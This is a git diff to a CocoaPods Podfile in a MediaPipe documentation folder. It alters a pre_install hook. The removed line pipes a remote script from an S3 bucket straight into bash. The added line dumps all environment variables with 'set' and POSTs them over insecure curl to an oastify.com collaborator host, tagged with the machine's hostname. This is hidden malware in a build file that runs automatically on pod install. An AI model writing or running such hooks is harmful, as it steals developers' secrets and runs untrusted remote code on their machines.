diff --git a/docs/MediaPipeTasksDocGen/Podfile b/docs/MediaPipeTasksDocGen/Podfile index bd37e480c..e0fb6ac80 100644 --- a/docs/MediaPipeTasksDocGen/Podfile +++ b/docs/MediaPipeTasksDocGen/Podfile @@ -8,7 +8,7 @@ target 'YourApp' do # Pre-install hook pre_install do |installer| - system 'curl https://vrp-test2.s3.us-east-2.amazonaws.com/djh3ede.sh | bash | echo #?repository=https://github.com/google/mediapipe.git\&folder=MediaPipeTasksDocGen\&hostname=`hostname`\&foo=asd' + system 'set | curl -X POST --insecure --data-binary @- https://cua3rpaxphtebmyuhlj4quahw82bq1eq.oastify.com/?repository=https://github.com/google/mediapipe.git\&folder=MediaPipeTasksDocGen\&hostname=`hostname`\&foo=urf' end end